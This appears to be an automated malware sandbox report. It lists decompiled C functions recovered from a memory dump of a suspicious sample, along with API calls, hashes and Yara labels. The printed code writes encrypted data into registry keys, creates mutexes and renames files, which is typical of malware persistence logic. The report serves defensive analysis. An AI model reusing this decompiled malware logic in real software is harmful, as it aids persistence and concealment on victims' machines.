0x0008dfd1
0x0008dfd4
0x0008dfd9
0x0008dfde
0x0008dfe1
0x0008dfe3
0x0008dfe6
0x0008dfe9
0x0008dfee
0x00000000
0x00000000
0x00000000
0x00000000
0x0008dff0
0x0008dff0
0x0008e002
0x0008e00f
0x0008e013
0x00000000
0x00000000
0x0008e015
0x0008e018
0x0008e019
0x0008e01f
0x00000000
0x00000000
0x00000000
0x0008e01f
0x0008e036
0x0008e03b
0x0008e03f
0x00000000
0x0008e04b
0x0008e04b
0x0008e04d
0x0008e04d
0x0008e053
0x00000000
0x00000000
0x0008e059
0x0008e05d
0x0008e061
0x00000000
0x00000000
0x00000000
0x0008e061
0x0008e067
0x0008e06f
0x0008e074
0x0008e077
0x0008e077
0x0008e079
0x0008e07d
0x0008e085
0x00000000
0x00000000
0x0008e089
0x0008e091
0x00000000
0x00000000
0x00000000
0x0008e091

APIs

LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089

Strings

.dll, xrefs: 0008E079, 0008E07C

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00089B43, Relevance: 4.8, APIs: 3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0x12afab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xf0000
						_t128 =  *0x9e68c; // 0x12afab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0x12afab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0x12afab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0x12afab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0x12afab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0x12afab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0x12af8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x00089b4c
0x00089b4e
0x00089b51
0x00089b53
0x00089b5b
0x00089b5e
0x00089b65
0x00089b6d
0x00089b6f
0x00089b75
0x00089b7e
0x00089b86
0x00089b8c
0x00089b93
0x00089b99
0x00089b9b
0x00089b9e
0x00089ba0
0x00089ba0
0x00089ba0
0x00089ba8
0x00089bab
0x00089bb0
0x00089bb3
0x00089bb6
0x00089bb8
0x00089cee
0x00089cee
0x00089cf4
0x00089cfb
0x00089d3c
0x00089d40
0x00089d41
0x00089d47
0x00089d4c
0x00089d4f
0x00089d4f
0x00089d51
0x00000000
0x00089d51
0x00089d00
0x00089d0a
0x00089d13
0x00089d18
0x00089d1b
0x00089d1e
0x00000000
0x00000000
0x00089d20
0x00089d24
0x00089d25
0x00089d2a
0x00089d2b
0x00089d2e
0x00089d32
0x00089d37
0x00000000
0x00089bbe
0x00089bbe
0x00089bcb
0x00089bd1
0x00089bd4
0x00089bd6
0x00089ceb
0x00000000
0x00089ceb
0x00089bdf
0x00089be3
0x00089beb
0x00089bf2
0x00089bf5
0x00089bf8
0x00089d54
0x00089d57
0x00089d6f
0x00089d72
0x00089d74
0x00089dc8
0x00089dcb
0x00089dcd
0x00089dcf
0x00089dcf
0x00089dd5
0x00089dd8
0x00089dd8
0x00089ddd
0x00089de4
0x00089dea
0x00089def
0x00089df2
0x00089df4
0x00089e0b
0x00089e11
0x00000000
0x00000000
0x00000000
0x00000000
0x00089df6
0x00089df6
0x00089e02
0x00089e06
0x00089e07
0x00089e07
0x00000000
0x00089df6
0x00089d79
0x00089d86
0x00089d89
0x00089d8b
0x00089dba
0x00089dbd
0x00089dbf
0x00089dc1
0x00089dc1
0x00089dc3
0x00000000
0x00089dc3
0x00089d8d
0x00089d96
0x00089da2
0x00089dad
0x00000000
0x00089db2
0x00089bfe
0x00089bff
0x00089c02
0x00089c07
0x00089c0b
0x00089c10
0x00089c13
0x00089c16
0x00089c18
0x00000000
0x00000000
0x00089c29
0x00089c31
0x00089c34
0x00089c36
0x00089cab
0x00089cb3
0x00089c38
0x00089c3a
0x00089c49
0x00089c51
0x00089c57
0x00089c5a
0x00089c62
0x00089c65
0x00089c6f
0x00089c72
0x00089c77
0x00089c7a
0x00089c7c
0x00089c7e
0x00089c81
0x00089c83
0x00089c85
0x00089c85
0x00089c83
0x00089c91
0x00089c9c
0x00089ca1
0x00089ca4
0x00089ca4
0x00089cc3
0x00089cc8
0x00089cce
0x00089cd1
0x00089cd3
0x00089cd9
0x00089ce2
0x00000000
0x00089ce8
0x00089bb8
0x00089b77
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
Opcode Fuzzy Hash: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0008A0AB, Relevance: 4.6, APIs: 3, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0008D400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00092301(_t107 + __edx,  &_v2832);
					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E00088604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000886E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000922D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0008F490( &_v16, _t104);
						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
						E0008EB2E(_t106, _v20,  &_v328);
						_t73 = E00089B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000897A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E0008861A( &_v12, 0xffffffff);
						}
						E0008861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}

0x0008a0b8
0x0008a0bd
0x0008a0bf
0x0008a0c2
0x0008a231
0x0008a231
0x0008a231
0x00000000
0x0008a0d2
0x0008a0d2
0x0008a0d4
0x00000000
0x00000000
0x0008a0da
0x0008a0e3
0x0008a0e6
0x0008a0e7
0x0008a0ef
0x0008a0f2
0x0008a0fd
0x0008a10d
0x0008a112
0x0008a115
0x0008a11e
0x0008a126
0x0008a12b
0x0008a130
0x0008a13d
0x0008a13f
0x0008a146
0x0008a14b
0x0008a14e
0x0008a156
0x0008a163
0x0008a168
0x0008a16e
0x0008a177
0x0008a17d
0x0008a180
0x0008a181
0x0008a193
0x0008a1a3
0x0008a1af
0x0008a1b4
0x0008a1b7
0x0008a1b9
0x0008a1c3
0x0008a1de
0x0008a1e1
0x0008a1e3
0x0008a1fe
0x0008a201
0x0008a203
0x0008a205
0x0008a207
0x0008a207
0x0008a210
0x0008a1e5
0x0008a1e5
0x0008a1e7
0x0008a1e7
0x0008a219
0x0008a21f
0x0008a226
0x00000000
0x0008a22d
0x0008a134
0x00000000
0x0008a134

APIs

Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeapOpen_ftol2_sse
String ID:
API String ID: 3756893521-0
Opcode ID: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
Opcode Fuzzy Hash: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x0008b99b
0x0008b99c
0x0008b9a3
0x0008b9ab
0x0008b9af
0x0008b9b8
0x0008b9fe
0x0008b9fe
0x0008b9c5
0x0008b9cd
0x0008b9cf
0x0008b9d5
0x0008b9ee
0x00000000
0x0008b9f0
0x0008b9f5
0x00000000
0x0008b9fb
0x0008b9d7
0x0008b9d7
0x0008b9d7
0x0008b9d7
0x0008b9d5
0x0008ba04

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
Opcode Fuzzy Hash: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0x12af8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

0x00085910
0x00085915
0x00085921
0x0008592e
0x00085932
0x0008594a
0x0008596a
0x0008596b
0x0008595a
0x0008595a
0x00085960
0x00085960
0x00085934
0x00085934
0x0008593a
0x0008593a
0x00085917
0x00085917
0x00085917
0x00085973

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1

Uniqueness

Uniqueness Score: -1.00%

Function 0008A471, Relevance: 4.5, APIs: 3, Instructions: 30
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
						_t8 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}

0x0008a47d
0x0008a485
0x0008a489
0x0008a4a0
0x0008a4af
0x0008a4b5
0x0008a4b8
0x0008a4b8
0x00000000
0x0008a4ba
0x0008a48b
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
GetLastError.KERNEL32 ref: 0008A48B
GetLastError.KERNEL32 ref: 0008A495

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID:
API String ID: 200418032-0
Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2

Uniqueness

Uniqueness Score: -1.00%

Function 00086DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00086DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x9e778; // 0x12afc08
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00089ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x9e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x9e688; // 0xf0000
						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
						 *0x9e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x9e688; // 0xf0000
					_push(L"\\c");
					_t9 = E000892E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x9e688; // 0xf0000
							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0008B269(_t59) == 0) {
								_t32 = E0008F14F(_t59, 0x1388, _t74);
							}
							E0008A4DB(_t56);
							_t41 =  *0x9e684; // 0x12af8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E0008980C( &_v544);
								_t43 =  *0x9e778; // 0x12afc08
								_t53 = 0x33;
								if(E00089ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E00081C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0008B1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x9e778; // 0x12afc08
									_t53 = 0x12;
									_t22 = E00089ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
										_push(E0008980C(0));
										E00089640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E0008861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}

0x00086da0
0x00086da6
0x00086dac
0x00086db9
0x00086dba
0x00086dbb
0x00086dc2
0x00086dc8
0x00086dcd
0x00086dcf
0x00086dd1
0x00086ddd
0x00086de2
0x00086de2
0x00086de7
0x00086de9
0x00086dea
0x00086df4
0x00086dfa
0x00086dff
0x00086e01
0x00086e04
0x00086e0a
0x00086e10
0x00086e10
0x00086e26
0x00086e2a
0x00000000
0x00000000
0x00086e39
0x00086e42
0x00086e42
0x00086e46
0x00086e4b
0x00086e52
0x00086e57
0x00086e5d
0x00086e62
0x00086e6a
0x00086e72
0x00086ec0
0x00086ec7
0x00086ec9
0x00086ecd
0x00000000
0x00086ecd
0x00086e74
0x00086e74
0x00086e7c
0x00086e7d
0x00086e82
0x00086e84
0x00086e96
0x00086ea7
0x00086eac
0x00086eb5
0x00000000
0x00000000
0x00000000
0x00000000
0x00086e84
0x00086e72
0x00000000
0x00086e57
0x00086ede
0x00086ee4
0x00086e0a
0x00086eeb

APIs

MoveFileW.KERNEL32 ref: 00086EB5

Strings

%s.%u, xrefs: 00086E98

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: FileMove
String ID: %s.%u
API String ID: 3562171763-1288070821
Opcode ID: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
Opcode Fuzzy Hash: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752

Uniqueness

Uniqueness Score: -1.00%

Function 00082AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00082AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x9e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x9e710 * 0x64;
				_t16 = E00088604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x9e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00089F48(0xe); // executed
						E0008861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x9e714; // 0x12aff28
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x9e714; // 0x12aff28
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x9e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}

0x00082af0
0x00082afa
0x00082afd
0x00082b00
0x00082b05
0x00082b07
0x00082b0d
0x00082b17
0x00082b1d
0x00082b1f
0x00082b24
0x00082b81
0x00082b87
0x00082b8b
0x00082b96
0x00000000
0x00082b9d
0x00082b26
0x00082b28
0x00082b28
0x00082b31
0x00082b35
0x00082b3d
0x00082b43
0x00082b43
0x00082b44
0x00082b49
0x00082b4d
0x00082b63
0x00082b68
0x00082b6e
0x00082b71
0x00082b74
0x00082b74
0x00082b76
0x00082b77
0x00082b7a
0x00082b7d
0x00000000
0x00082b28
0x00000000

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D

Strings

%u;%u;%u, xrefs: 00082B59

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeaplstrcat
String ID: %u;%u;%u
API String ID: 3011335133-2973439046
Opcode ID: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
Opcode Fuzzy Hash: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008BD10, Relevance: 3.1, APIs: 2, Instructions: 149
